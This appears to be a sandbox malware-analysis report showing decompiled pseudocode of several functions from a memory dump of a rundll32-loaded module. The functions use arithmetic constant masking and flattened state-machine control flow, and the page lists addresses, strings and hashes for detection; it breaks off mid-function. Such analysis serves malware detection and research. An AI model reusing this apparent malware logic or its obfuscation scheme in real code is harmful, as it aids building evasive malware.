				_v168 = 0xb9f2;
				_v168 = _v168 + 0x6761;
				_v168 = _v168 | 0xde33d667;
				_t356 = 0x33;
				_t314 = 6;
				_v168 = _v168 * 0x52;
				_v168 = _v168 ^ 0x2ca57843;
				_v184 = 0xf219;
				_v184 = _v184 >> 3;
				_v184 = _v184 >> 0x10;
				_v184 = _v184 ^ 0xfb40b647;
				_v184 = _v184 ^ 0xfb40ecc4;
				_v108 = 0x9add;
				_v108 = _v108 + 0xffff672d;
				_v108 = _v108 ^ 0x000036dd;
				_v172 = 0x9a72;
				_v172 = _v172 + 0xffff8d3f;
				_v172 = _v172 + 0xfffffc02;
				_v172 = _v172 | 0x37908701;
				_v172 = _v172 ^ 0x3790b656;
				_v112 = 0xd99f;
				_v112 = _v112 + 0x4543;
				_v112 = _v112 ^ 0x00016f24;
				_v96 = 0x426a;
				_v96 = _v96 * 0x3b;
				_v96 = _v96 ^ 0x000f351d;
				_v180 = 0x53b8;
				_v180 = _v180 << 8;
				_v180 = _v180 << 7;
				_v180 = _v180 ^ 0x33494c6e;
				_v180 = _v180 ^ 0x1a95151b;
				_v188 = 0xa902;
				_v188 = _v188 ^ 0x50d9c14e;
				_v188 = _v188 / _t356;
				_v188 = _v188 << 0x10;
				_v188 = _v188 ^ 0xd4de4daa;
				_v92 = 0xbb9f;
				_v92 = _v92 / _t314;
				_v92 = _v92 ^ 0x00007be4;
				_v192 = 0x56f;
				_v192 = _v192 | 0xbe63f676;
				_v192 = _v192 + 0xffff5295;
				_t315 = 0x50;
				_v192 = _v192 / _t315;
				_v192 = _v192 ^ 0x026118ba;
				_v156 = 0x6b88;
				_v156 = _v156 ^ 0x09655f93;
				_v156 = _v156 | 0x7b8c986c;
				_v156 = _v156 ^ 0x7bed91c8;
				_v164 = 0x577a;
				_v164 = _v164 | 0x244a900b;
				_t316 = 0x5a;
				_v164 = _v164 / _t316;
				_v164 = _v164 + 0x9fa4;
				_v164 = _v164 ^ 0x0067dbdf;
				_v136 = 0xa98d;
				_v136 = _v136 | 0x711af761;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0xb7daee67;
				_v144 = 0x63df;
				_v144 = _v144 / _t356;
				_v144 = _v144 * 0x57;
				_v144 = _v144 ^ 0x0000bd33;
				_v100 = 0x4120;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x00024174;
				_v120 = 0xe31b;
				_v120 = _v120 << 0xc;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00389bee;
				_v128 = 0x8413;
				_v128 = _v128 | 0xa7dc13b4;
				_v128 = _v128 + 0x7a44;
				_v128 = _v128 ^ 0xa7dd15d2;
				while(_t319 != 0xc3c7878) {
					if(_t319 == 0x13e32aa5) {
						_push(_v148);
						_push(_v132);
						_push( &_v68);
						_push(_v176);
						_t355 = 0x44;
						E001A554B(_t355, _v140);
						_push(_v184);
						_v68 = _t355;
						_push(_v168);
						_t321 = _v88;
						_v60 = E001A5EBA(_v88, 0x1001f870, __eflags);
						_t354 = E001A16E8(_v108, _v112, _v96, _a20, _v84, _a4,  &_v68, 0, _v88, _t321, _t353, _v180, _v188, _v92, _v160 | _v104, _t321, _v192, _v156);
						E001AED35(_v164, _v60, _v136, _v144);
						_t359 =  &(_t359[0x19]);
						_t319 = 0x29a7a7af;
						continue;
					} else {
						if(_t319 == 0x29a7a7af) {
							E001AD226(_v100, _v120, _v128, _v84);
						} else {
							if(_t319 != 0x29f69dbc) {
								L9:
								__eflags = _t319 - 0x216615a4;
								if(_t319 != 0x216615a4) {
									continue;
								} else {
								}
							} else {
								_push(_t319);
								_t309 = E001A75C9( &_v84, _v116, _v124, _a20, _v152);
								_t359 =  &(_t359[4]);
								if(_t309 != 0) {
									_t319 = 0x13e32aa5;
									continue;
								}
							}
						}
					}
					return _t354;
				}
				_t319 = 0x29f69dbc;
				goto L9;
			}

0x001add30
0x001add32
0x001add33
0x001add3a
0x001add41
0x001add42
0x001add49
0x001add50
0x001add57
0x001add58
0x001add59
0x001add5e
0x001add65
0x001add68
0x001add6c
0x001add6e
0x001add7b
0x001add86
0x001add8b
0x001add93
0x001add98
0x001adda0
0x001addae
0x001addb3
0x001addbd
0x001addc2
0x001addc8
0x001addcd
0x001addd5
0x001adddd
0x001adde5
0x001added
0x001addfa
0x001addfd
0x001ade01
0x001ade09
0x001ade19
0x001ade1d
0x001ade22
0x001ade2a
0x001ade32
0x001ade3a
0x001ade42
0x001ade4a
0x001ade52
0x001ade5a
0x001ade62
0x001ade6a
0x001ade72
0x001ade7e
0x001ade81
0x001ade85
0x001ade8d
0x001ade95
0x001ade9d
0x001adea2
0x001adeaa
0x001adeb2
0x001adebf
0x001adec5
0x001adecd
0x001aded5
0x001adedd
0x001adeec
0x001adeef
0x001adef0
0x001adef4
0x001adefc
0x001adf04
0x001adf09
0x001adf0e
0x001adf16
0x001adf1e
0x001adf26
0x001adf2e
0x001adf36
0x001adf3e
0x001adf46
0x001adf4e
0x001adf56
0x001adf5e
0x001adf66
0x001adf6e
0x001adf76
0x001adf85
0x001adf89
0x001adf91
0x001adf99
0x001adf9e
0x001adfa3
0x001adfab
0x001adfb3
0x001adfbb
0x001adfcb
0x001adfcf
0x001adfd4
0x001adfdc
0x001adfec
0x001adff0
0x001adff8
0x001ae000
0x001ae008
0x001ae014
0x001ae019
0x001ae01f
0x001ae027
0x001ae02f
0x001ae037
0x001ae03f
0x001ae047
0x001ae04f
0x001ae05b
0x001ae05e
0x001ae062
0x001ae06a
0x001ae072
0x001ae07a
0x001ae087
0x001ae08b
0x001ae093
0x001ae0ad
0x001ae0b6
0x001ae0ba
0x001ae0c2
0x001ae0ca
0x001ae0cf
0x001ae0d7
0x001ae0df
0x001ae0e4
0x001ae0e9
0x001ae0f1
0x001ae0f9
0x001ae101
0x001ae109
0x001ae111
0x001ae11f
0x001ae164
0x001ae16f
0x001ae173
0x001ae174
0x001ae17e
0x001ae181
0x001ae186
0x001ae18f
0x001ae196
0x001ae19a
0x001ae1a9
0x001ae218
0x001ae22c
0x001ae231
0x001ae234
0x00000000
0x001ae121
0x001ae127
0x001ae25e
0x001ae12d
0x001ae12f
0x001ae240
0x001ae240
0x001ae246
0x00000000
0x00000000
0x001ae24c
0x001ae135
0x001ae135
0x001ae150
0x001ae155
0x001ae15a
0x001ae160
0x00000000
0x001ae160
0x001ae15a
0x001ae12f
0x001ae127
0x001ae271
0x001ae271
0x001ae23e
0x00000000

Strings

CE, xrefs: 001ADF66
I, xrefs: 001ADDE5
e}, xrefs: 001ADE42
{, xrefs: 001ADFF0
zW, xrefs: 001AE047
Dz, xrefs: 001AE101
nLI3, xrefs: 001ADFA3
a, xrefs: 001ADDC8
jB, xrefs: 001ADF76
ag, xrefs: 001ADED5
A, xrefs: 001AE0C2

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: A$ I$CE$Dz$a$ag$e}$jB$nLI3$zW${
API String ID: 0-1660822030
Opcode ID: 5c584343cd096bc7d1e2fa4a1d5726fcca195432cfec29b4d06f6dd42839f0cf
Instruction ID: 890fd6ebd85cb5ac410b9cd65286ef1629e23818ca63aee3e907fea0623275b8
Opcode Fuzzy Hash: 5c584343cd096bc7d1e2fa4a1d5726fcca195432cfec29b4d06f6dd42839f0cf
Instruction Fuzzy Hash: 0BD1F2715083809FE764CF21C88AA5BFBF2BBD5748F608A1DF29596260D3B68945CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001AD760, Relevance: 14.0, Strings: 11, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001AD760() {
				char _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _t238;
				signed int _t245;
				void* _t246;
				void* _t253;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int* _t280;
				void* _t283;

				_t280 =  &_v616;
				_v616 = 0x938;
				_v616 = _v616 ^ 0x32036c1e;
				_t253 = 0x35b1a35d;
				_v616 = _v616 + 0xff50;
				_v616 = _v616 ^ 0xa41e4e33;
				_v616 = _v616 ^ 0x961a2a59;
				_v612 = 0xdff3;
				_v612 = _v612 | 0xbe472695;
				_v612 = _v612 * 0x78;
				_t278 = 0;
				_v612 = _v612 ^ 0x31bffbe1;
				_v532 = 0x6e1d;
				_v532 = _v532 >> 7;
				_v532 = _v532 ^ 0x00000a14;
				_v564 = 0xff96;
				_v564 = _v564 + 0xffff5f63;
				_v564 = _v564 ^ 0x15bee6b4;
				_v564 = _v564 ^ 0x15bef768;
				_v572 = 0xbf90;
				_v572 = _v572 ^ 0x8dbf6b3a;
				_v572 = _v572 ^ 0xb4b17f40;
				_v572 = _v572 ^ 0x390ee5dd;
				_v592 = 0x9d61;
				_v592 = _v592 ^ 0x6502afb0;
				_v592 = _v592 + 0x4849;
				_v592 = _v592 ^ 0x65024033;
				_v524 = 0xe5fa;
				_v524 = _v524 << 0x10;
				_v524 = _v524 ^ 0xe5fa043a;
				_v560 = 0xfa73;
				_v560 = _v560 + 0xffff8509;
				_v560 = _v560 << 9;
				_v560 = _v560 ^ 0x00fea094;
				_v604 = 0xfa09;
				_t273 = 0x70;
				_v604 = _v604 / _t273;
				_v604 = _v604 + 0x2f57;
				_t274 = 0x74;
				_v604 = _v604 * 0x5e;
				_v604 = _v604 ^ 0x00121f94;
				_v600 = 0x3629;
				_v600 = _v600 >> 2;
				_v600 = _v600 + 0xffff9581;
				_v600 = _v600 >> 9;
				_v600 = _v600 ^ 0x007fa760;
				_v548 = 0x2e8e;
				_v548 = _v548 + 0xffff60e4;
				_v548 = _v548 ^ 0xffff8d3b;
				_v588 = 0xb31d;
				_v588 = _v588 | 0xd642c293;
				_v588 = _v588 << 3;
				_v588 = _v588 ^ 0xb217a161;
				_v584 = 0x4f6f;
				_v584 = _v584 << 6;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 ^ 0x00001065;
				_v580 = 0x9a9f;
				_v580 = _v580 ^ 0x0378d1e4;
				_v580 = _v580 << 9;
				_v580 = _v580 ^ 0xf096f6e0;
				_v576 = 0xa090;
				_v576 = _v576 * 0x12;
				_v576 = _v576 / _t274;
				_v576 = _v576 ^ 0x000043d4;
				_v556 = 0xb0dc;
				_v556 = _v556 | 0x5e6d4122;
				_t275 = 0x13;
				_v556 = _v556 / _t275;
				_v556 = _v556 ^ 0x04f8392e;
				_v540 = 0x3b95;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00003a71;
				_v528 = 0x300a;
				_v528 = _v528 + 0xffffbde9;
				_v528 = _v528 ^ 0xffff9e12;
				_v596 = 0xa76d;
				_v596 = _v596 | 0xfc73e0ba;
				_v596 = _v596 + 0x7ac;
				_t276 = 0x45;
				_v596 = _v596 / _t276;
				_v596 = _v596 ^ 0x03a8fd89;
				_v536 = 0xd61b;
				_v536 = _v536 << 0xe;
				_v536 = _v536 ^ 0x3586f9d3;
				_v544 = 0xec11;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0x0760a93a;
				_v612 = 0x6b8a;
				_v612 = _v612 * 0xc;
				_v612 = _v612 + 0xe792;
				_v612 = _v612 ^ 0x0005ae49;
				_v616 = 0x715a;
				_v616 = _v616 + 0xffff7452;
				_v616 = _v616 << 5;
				_v616 = _v616 | 0xbe8e5d80;
				_v616 = _v616 ^ 0xfffec153;
				_v552 = 0x4309;
				_v552 = _v552 << 9;
				_v552 = _v552 ^ 0x00866d23;
				_t277 = _v552;
				_v568 = 0x8663;
				_v568 = _v568 + 0x76b8;
				_v568 = _v568 * 0x38;
				_v568 = _v568 ^ 0x00385dd7;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t253 - 0x2d2ebb3f;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							_v608 = 0x1852;
							_v608 = _v608 ^ 0xbdd0a054;
							_v608 = _v608 << 8;
							_v608 = _v608 ^ 0xd0b8061c;
							 *((intOrPtr*)( *0x10020724 + 0x228)) = 0x100110be;
							L8:
							_t253 = 0xce138b9;
							continue;
						}
						if(_t253 == 0x30f3286) {
							_t277 = E001B92EB(_t253, _v524, _v568, _t253, _v560, _v604);
							_t280 =  &(_t280[4]);
							__eflags = _t277;
							if(_t277 == 0) {
								_t253 = 0x2d2ebb3f;
							} else {
								 *((intOrPtr*)( *0x10020724 + 0x218)) = 1;
								_t253 = 0x3245856c;
							}
							continue;
						}
						if(_t253 == 0x9276d2c) {
							E001AC6CE();
							_t253 = 0x35f8f7f9;
							continue;
						}
						if(_t253 == 0xce138b9) {
							_push(_t253);
							_t245 = E001B1DA0(_v576, _v556, _v540,  *0x10020724 + 0x238, _v528, _t253, _v608);
							_t280 =  &(_t280[8]);
							_t253 = 0x9276d2c;
							__eflags = _t245;
							_t246 = 1;
							_t278 =  ==  ? _t246 : _t278;
							continue;
						}
						if(_t253 != 0x177ea9c7) {
							goto L23;
						}
						E001A24A4(_t277, _v600, _v548, _v588, _v584);
						_t280 =  &(_t280[3]);
						goto L8;
					}
					__eflags = _t253 - 0x3245856c;
					if(_t253 == 0x3245856c) {
						_v608 = 0xaeea;
						_t253 = 0x177ea9c7;
						_v608 = _v608 * 0x7a;
						_t218 =  &_v608;
						 *_t218 = _v608 ^ 0x00535bad;
						__eflags =  *_t218;
						goto L23;
					}
					__eflags = _t253 - 0x35b1a35d;
					if(_t253 == 0x35b1a35d) {
						_push(_t253);
						_push(_t253);
						_t238 = E001B922B(0x448);
						_t280 =  &(_t280[3]);
						 *0x10020724 = _t238;
						__eflags = _t238;
						if(_t238 == 0) {
							L19:
							return _t278;
						}
						 *((intOrPtr*)(_t238 + 0x224)) = 0x1000b7f8;
						_t253 = 0x30f3286;
						goto L1;
					}
					__eflags = _t253 - 0x35f8f7f9;
					if(__eflags != 0) {
						goto L23;
					}
					E001AD194(_v596,  &_v520, __eflags, _t253, _v536, _v544);
					 *((intOrPtr*)( *0x10020724 + 0x444)) = E001B7A96(_v616,  &_v520, _v552);
					goto L19;
					L23:
					__eflags = _t253 - 0xce35d93;
				} while (_t253 != 0xce35d93);
				goto L19;
			}

0x001ad760
0x001ad766
0x001ad76f
0x001ad776
0x001ad77b
0x001ad782
0x001ad789
0x001ad790
0x001ad798
0x001ad7a9
0x001ad7ad
0x001ad7af
0x001ad7b7
0x001ad7bf
0x001ad7c4
0x001ad7cc
0x001ad7d4
0x001ad7dc
0x001ad7e4
0x001ad7ec
0x001ad7f4
0x001ad7fc
0x001ad804
0x001ad80c
0x001ad814
0x001ad81c
0x001ad824
0x001ad82c
0x001ad834
0x001ad839
0x001ad841
0x001ad849
0x001ad851
0x001ad856
0x001ad85e
0x001ad86c
0x001ad871
0x001ad877
0x001ad884
0x001ad885
0x001ad889
0x001ad891
0x001ad899
0x001ad89e
0x001ad8a6
0x001ad8ab
0x001ad8b3
0x001ad8bb
0x001ad8c3
0x001ad8cb
0x001ad8d3
0x001ad8db
0x001ad8e0
0x001ad8e8
0x001ad8f0
0x001ad8f5
0x001ad8fa
0x001ad902
0x001ad90a
0x001ad912
0x001ad917
0x001ad91f
0x001ad92c
0x001ad936
0x001ad93a
0x001ad942
0x001ad94a
0x001ad95a
0x001ad95f
0x001ad965
0x001ad972
0x001ad97f
0x001ad984
0x001ad98c
0x001ad994
0x001ad99c
0x001ad9a4
0x001ad9ac
0x001ad9b4
0x001ad9c0
0x001ad9c3
0x001ad9c7
0x001ad9cf
0x001ad9d7
0x001ad9dc
0x001ad9e4
0x001ad9ec
0x001ad9f1
0x001ad9f9
0x001ada06
0x001ada0a
0x001ada12
0x001ada1a
0x001ada22
0x001ada2a
0x001ada2f
0x001ada37
0x001ada3f
0x001ada47
0x001ada4c
0x001ada54
0x001ada58
0x001ada60
0x001ada6d
0x001ada71
0x001ada71
0x001ada79
0x001ada79
0x001ada79
0x001ada79
0x001ada7b
0x00000000
0x00000000
0x001ada81
0x001adb55
0x001adb5d
0x001adb65
0x001adb6a
0x001adb77
0x001adac5
0x001adac5
0x00000000
0x001adac5
0x001ada8d
0x001adb2d
0x001adb2f
0x001adb32
0x001adb34
0x001adb4e
0x001adb36
0x001adb3e
0x001adb44
0x001adb44
0x00000000
0x001adb34
0x001ada99
0x001adb08
0x001adb0d
0x00000000
0x001adb0d
0x001ada9d
0x001adac9
0x001adaee
0x001adaf3
0x001adaf6
0x001adafb
0x001adaff
0x001adb00
0x00000000
0x001adb00
0x001adaa5
0x00000000
0x00000000
0x001adabd
0x001adac2
0x00000000
0x001adac2
0x001adb86
0x001adb8c
0x001adc2d
0x001adc35
0x001adc3f
0x001adc43
0x001adc43
0x001adc43
0x00000000
0x001adc43
0x001adb92
0x001adb98
0x001adc01
0x001adc02
0x001adc08
0x001adc0d
0x001adc10
0x001adc15
0x001adc17
0x001adbe5
0x001adbf0
0x001adbf0
0x001adc19
0x001adc23
0x00000000
0x001adc23
0x001adb9a
0x001adba0
0x00000000
0x00000000
0x001adbb7
0x001adbde
0x00000000
0x001adc4b
0x001adc4b
0x001adc4b
0x00000000

Strings

q:, xrefs: 001AD984
Zq, xrefs: 001ADA1A
ar-KW, xrefs: 001ADAD3, 001ADADD, 001ADB36, 001ADB72, 001ADBD5, 001ADC10
,m', xrefs: 001ADA93
IH, xrefs: 001AD81C
0, xrefs: 001AD98C
"Am^, xrefs: 001AD94A
C, xrefs: 001ADA3F
)6, xrefs: 001AD891
,m', xrefs: 001ADAF6
oO, xrefs: 001AD8E8

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$0$"Am^$)6$,m'$,m'$IH$Zq$ar-KW$oO$q:
API String ID: 0-4233947637
Opcode ID: d28346a4fe486d2ea461f0fedc06e4ee1d6722c6a63c36d329243ac030958468
Instruction ID: a4e248c1bb068398ea470e95337ecd8fcd2aa5d59e4d83711c4f78c8f08b194e
Opcode Fuzzy Hash: d28346a4fe486d2ea461f0fedc06e4ee1d6722c6a63c36d329243ac030958468
Instruction Fuzzy Hash: 5DC141B15083419FD358CF61D98A42BBBF1FBC5748F508A1EF19686260D3B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A77F0, Relevance: 12.7, Strings: 10, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001A77F0() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _t210;
				void* _t212;
				intOrPtr _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int* _t245;

				_t245 =  &_v1132;
				_v1052 = 0x632f4e;
				_v1048 = 0x635133;
				_t212 = 0x16a3f513;
				_t238 = 0;
				_v1044 = 0;
				_v1124 = 0x9f90;
				_v1124 = _v1124 >> 0xa;
				_t239 = 0x3c;
				_v1124 = _v1124 / _t239;
				_v1124 = _v1124 ^ 0x00006131;
				_v1056 = 0x247a;
				_v1056 = _v1056 ^ 0x00001d36;
				_v1100 = 0xd155;
				_v1100 = _v1100 | 0xed29fdfb;
				_v1100 = _v1100 ^ 0xed29d5f9;
				_v1096 = 0xce4f;
				_v1096 = _v1096 ^ 0x20a35301;
				_v1096 = _v1096 | 0x7e045482;
				_v1096 = _v1096 ^ 0x7ea7fd15;
				_v1112 = 0xfc59;
				_t210 = 0x79;
				_t240 = 0x65;
				_v1112 = _v1112 * 0x52;
				_v1112 = _v1112 + 0xd38d;
				_v1112 = _v1112 ^ 0x0051af17;
				_v1072 = 0xec58;
				_v1072 = _v1072 << 0xc;
				_v1072 = _v1072 ^ 0x0ec5d703;
				_v1132 = 0xc721;
				_v1132 = _v1132 + 0xffffc1c4;
				_v1132 = _v1132 * 0x39;
				_v1132 = _v1132 ^ 0x4dd4d269;
				_v1132 = _v1132 ^ 0x4dcaf468;
				_v1064 = 0x4f6d;
				_v1064 = _v1064 >> 2;
				_v1064 = _v1064 ^ 0x0000764d;
				_v1060 = 0xda4f;
				_v1060 = _v1060 * 0x22;
				_v1060 = _v1060 ^ 0x001ce3d4;
				_v1104 = 0xbff0;
				_v1104 = _v1104 << 7;
				_v1104 = _v1104 ^ 0x6305f488;
				_v1104 = _v1104 ^ 0x635a2074;
				_v1108 = 0xd64a;
				_v1108 = _v1108 / _t210;
				_v1108 = _v1108 / _t240;
				_v1108 = _v1108 ^ 0x00004602;
				_v1116 = 0x912b;
				_t241 = 0x19;
				_v1116 = _v1116 / _t241;
				_v1116 = _v1116 ^ 0x45e44a8a;
				_v1116 = _v1116 ^ 0x45e455b1;
				_v1088 = 0x436;
				_v1088 = _v1088 | 0x7e12b186;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0xe12b0ab0;
				_v1084 = 0x66f5;
				_v1084 = _v1084 ^ 0xe16a847f;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 ^ 0x0001a5da;
				_v1092 = 0x4b4f;
				_t242 = 0x41;
				_v1092 = _v1092 * 0x4f;
				_v1092 = _v1092 | 0x992ab812;
				_v1092 = _v1092 ^ 0x993faeb1;
				_v1080 = 0xaa47;
				_v1080 = _v1080 | 0x89157137;
				_v1080 = _v1080 ^ 0x8915ac17;
				_v1068 = 0x9dfd;
				_v1068 = _v1068 ^ 0xa19944f0;
				_v1068 = _v1068 ^ 0xa199c481;
				_v1128 = 0x9c99;
				_v1128 = _v1128 | 0xb1660295;
				_v1128 = _v1128 / _t242;
				_v1128 = _v1128 / _t210;
				_v1128 = _v1128 ^ 0x0005bd51;
				_v1076 = 0x50aa;
				_v1076 = _v1076 >> 4;
				_v1076 = _v1076 ^ 0x0000592b;
				_v1120 = 0x7da8;
				_v1120 = _v1120 + 0xbe3b;
				_v1120 = _v1120 ^ 0x45da291f;
				_v1120 = _v1120 ^ 0x45db2e78;
				do {
					while(_t212 != 0x15d6a069) {
						if(_t212 == 0x16a3f513) {
							_t212 = 0x15d6a069;
							continue;
						} else {
							if(_t212 == 0x21bfbade) {
								E001A6005(_v1068, _v1128,  &_v1040, _v1076, _v1120);
							} else {
								if(_t212 == 0x29cbd021) {
									_push(_v1072);
									_push(_v1112);
									E001AEC82(__eflags, E001A5EBA(_v1096, 0x1001f800, __eflags), _v1132, _v1064, _v1060, _v1104,  *0x10020724 + 0x238,  &_v1040);
									E001AED35(_v1108, _t202, _v1116, _v1088);
									_t245 =  &(_t245[0xb]);
									_t212 = 0x2fe8bde6;
									continue;
								} else {
									_t252 = _t212 - 0x2fe8bde6;
									if(_t212 != 0x2fe8bde6) {
										goto L10;
									} else {
										E001B473C( &_v520, _v1084, _t252, _v1092, _v1080,  &_v1040);
										_t245 =  &(_t245[3]);
										_t238 =  !=  ? 1 : _t238;
										_t212 = 0x21bfbade;
										continue;
									}
								}
							}
						}
						L13:
						return _t238;
					}
					E001AD194(_v1124,  &_v520, __eflags, _t212, _v1056, _v1100);
					_t245 =  &(_t245[3]);
					_t212 = 0x29cbd021;
					L10:
					__eflags = _t212 - 0x23d9cc89;
				} while (__eflags != 0);
				goto L13;
			}

0x001a77f0
0x001a77f6
0x001a7800
0x001a7808
0x001a7811
0x001a7813
0x001a7817
0x001a781f
0x001a782a
0x001a782f
0x001a7835
0x001a783d
0x001a784d
0x001a7855
0x001a785d
0x001a7865
0x001a786d
0x001a7875
0x001a787d
0x001a7885
0x001a788d
0x001a789a
0x001a789d
0x001a78a0
0x001a78a4
0x001a78ac
0x001a78b4
0x001a78bc
0x001a78c1
0x001a78c9
0x001a78d1
0x001a78de
0x001a78e2
0x001a78ea
0x001a78f2
0x001a78fa
0x001a78ff
0x001a7907
0x001a7914
0x001a7918
0x001a7920
0x001a7928
0x001a792d
0x001a7935
0x001a793d
0x001a794d
0x001a7959
0x001a795d
0x001a7965
0x001a7971
0x001a7974
0x001a7978
0x001a7980
0x001a7988
0x001a7990
0x001a7998
0x001a799d
0x001a79a5
0x001a79af
0x001a79bc
0x001a79c1
0x001a79c9
0x001a79d8
0x001a79d9
0x001a79dd
0x001a79e5
0x001a79ed
0x001a79f5
0x001a79fd
0x001a7a05
0x001a7a0d
0x001a7a15
0x001a7a1d
0x001a7a25
0x001a7a35
0x001a7a44
0x001a7a48
0x001a7a50
0x001a7a58
0x001a7a5d
0x001a7a65
0x001a7a6d
0x001a7a75
0x001a7a7d
0x001a7a85
0x001a7a85
0x001a7a93
0x001a7b48
0x00000000
0x001a7a99
0x001a7a9f
0x001a7b90
0x001a7aa5
0x001a7aa7
0x001a7ae4
0x001a7aed
0x001a7b23
0x001a7b36
0x001a7b3b
0x001a7b3e
0x00000000
0x001a7aa9
0x001a7aa9
0x001a7aaf
0x00000000
0x001a7ab5
0x001a7acd
0x001a7ad4
0x001a7ada
0x001a7add
0x00000000
0x001a7add
0x001a7aaf
0x001a7aa7
0x001a7a9f
0x001a7b98
0x001a7ba4
0x001a7ba4
0x001a7b63
0x001a7b68
0x001a7b6b
0x001a7b6d
0x001a7b6d
0x001a7b6d
0x00000000

Strings

3Qc, xrefs: 001A7800
X, xrefs: 001A78B4
ar-KW, xrefs: 001A7B01, 001A7B0B, 001A7B1C
Mv, xrefs: 001A78FF
t Zc, xrefs: 001A7935
1a, xrefs: 001A7835
N/c, xrefs: 001A77F6
z$, xrefs: 001A783D
+Y, xrefs: 001A7A5D
OK, xrefs: 001A79C9

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +Y$1a$3Qc$Mv$N/c$OK$X$ar-KW$t Zc$z$
API String ID: 0-808526764
Opcode ID: 55163a50ec9b74664dbccfd43e446d332fb91601bb79891c6b2cc3d4abef2e6a
Instruction ID: 4d954aea1883cbb0abeebc5f04691c276e76d1ac9fd5fd6e2207820eb3924d57
Opcode Fuzzy Hash: 55163a50ec9b74664dbccfd43e446d332fb91601bb79891c6b2cc3d4abef2e6a
Instruction Fuzzy Hash: 859121711083819FD358CF66D98A81FFBE2BBC5758F10892DF596862A0C7B58A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A6EE4, Relevance: 11.5, Strings: 9, Instructions: 286
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E001A6EE4(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int* _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t240;
				void* _t258;
				intOrPtr _t273;
				intOrPtr _t274;
				intOrPtr* _t278;
				void* _t280;
				signed int _t283;
				intOrPtr _t305;
				intOrPtr* _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				signed int* _t314;
				void* _t317;

				_t278 = _a16;
				_push(_t278);
				_push(_a12);
				_t306 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t240);
				_v12 = 0x204fcd;
				_t305 = 0;
				_v8 = 0x4ddb6;
				_t314 =  &(( &_v124)[6]);
				_v4 = 0;
				_v100 = 0xb60d;
				_t280 = 0x23ed989b;
				_v100 = _v100 | 0x2f981f86;
				_v100 = _v100 + 0x719e;
				_v100 = _v100 + 0xffff31d1;
				_v100 = _v100 ^ 0x2f984437;
				_v80 = 0xef77;
				_v80 = _v80 + 0xffff5173;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000033f7;
				_v104 = 0x4377;
				_v104 = _v104 | 0x25119fc7;
				_t307 = 0x76;
				_v104 = _v104 / _t307;
				_v104 = _v104 + 0xa124;
